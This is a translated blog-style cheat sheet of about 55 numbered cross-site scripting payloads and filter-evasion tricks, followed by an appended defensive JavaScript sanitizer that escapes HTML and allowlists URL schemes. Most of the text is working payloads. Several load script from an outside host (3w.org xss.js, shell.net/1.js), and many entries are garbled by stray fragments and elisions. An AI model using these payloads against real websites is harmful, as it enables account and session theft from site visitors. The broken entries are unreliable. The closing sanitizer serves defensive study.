XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..省略..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..省略..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-character filtering in JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash containing XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
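Editor's addition, not part of the original post: the items above depend on a handful of parser behaviours, namely case-insensitive scheme matching (item 4), numeric character references that decode with or without a semicolon (items 5, 8-10), and control characters such as tab, newline, CR and NUL that the URL parser ignores (items 11-14, 17, 19), plus quotes that break out of an attribute (item 6). The JavaScript below shows the output-side checks that close those holes: HTML-encode every untrusted value, and for URL attributes normalize the value the way a browser would before allowing only http(s) and relative URLs. The function names (escapeHtml, decodeEntities, safeUrl, renderLink) and the sample inputs are constructed for this example.

```javascript
// Added defensive example (not from the original post): two output-side checks
// that neutralize the evasions the list above relies on. The function names
// and the sample inputs below are constructed for this example.

// Text and attribute context: encode the HTML metacharacters so that markup such
// as <SCRIPT SRC=...> or a stray "> is rendered literally instead of parsed.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Browsers decode numeric character references in attribute values even when
// the trailing semicolon is missing (items 5 and 8-10), and a few named ones,
// so do a single decoding pass the same way before inspecting the scheme.
function decodeEntities(s) {
  const named = { tab: '\t', newline: '\n', colon: ':' };
  return s.replace(/&#x([0-9a-f]+);?|&#(\d+);?|&(tab|newline|colon);/gi, (m, hex, dec, name) => {
    if (name !== undefined) return named[name.toLowerCase()];
    const n = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n);
  });
}

// URL context (SRC, HREF, BACKGROUND, CSS url(), ...): the scheme is matched
// case-insensitively (item 4) and ASCII control characters such as NUL, tab,
// CR and LF are ignored by the URL parser (items 11-14, 17 and 19). Normalize
// the same way, then allow only http(s) and relative URLs; anything else
// (javascript:, vbscript:, data:, ...) is rejected and null is returned.
function safeUrl(raw) {
  const cleaned = decodeEntities(String(raw)).replace(/[\x00-\x1f\x7f]/g, '').trim();
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (scheme === null) return cleaned;  // no scheme at all: relative URL
  return ['http', 'https'].includes(scheme[1].toLowerCase()) ? cleaned : null;
}

// Compose both checks: the validated URL is still HTML-encoded before it goes
// into the attribute, so a quote inside it cannot close the attribute (item 6).
function renderLink(href, text) {
  const url = safeUrl(href);
  return `<a href="${escapeHtml(url === null ? 'about:blank' : url)}">${escapeHtml(text)}</a>`;
}

// Constructed sample inputs drawn from the evasions listed above.
const samples = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  'java\u0000script:alert(1)',
  'jav&#x09;ascript:alert(1)',
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',
  'https://example.com/page',
  '/relative/path',
];
for (const s of samples) console.log(JSON.stringify(s), '->', JSON.stringify(safeUrl(s)));
```

The allowlist is deliberately narrow: a denylist of bad schemes is what the encoding, case and control-character tricks above are designed to slip past, whereas normalizing first and then accepting only known-good schemes leaves nothing for those tricks to hide behind. Run it with node to see each sample input and the value the check returns for it.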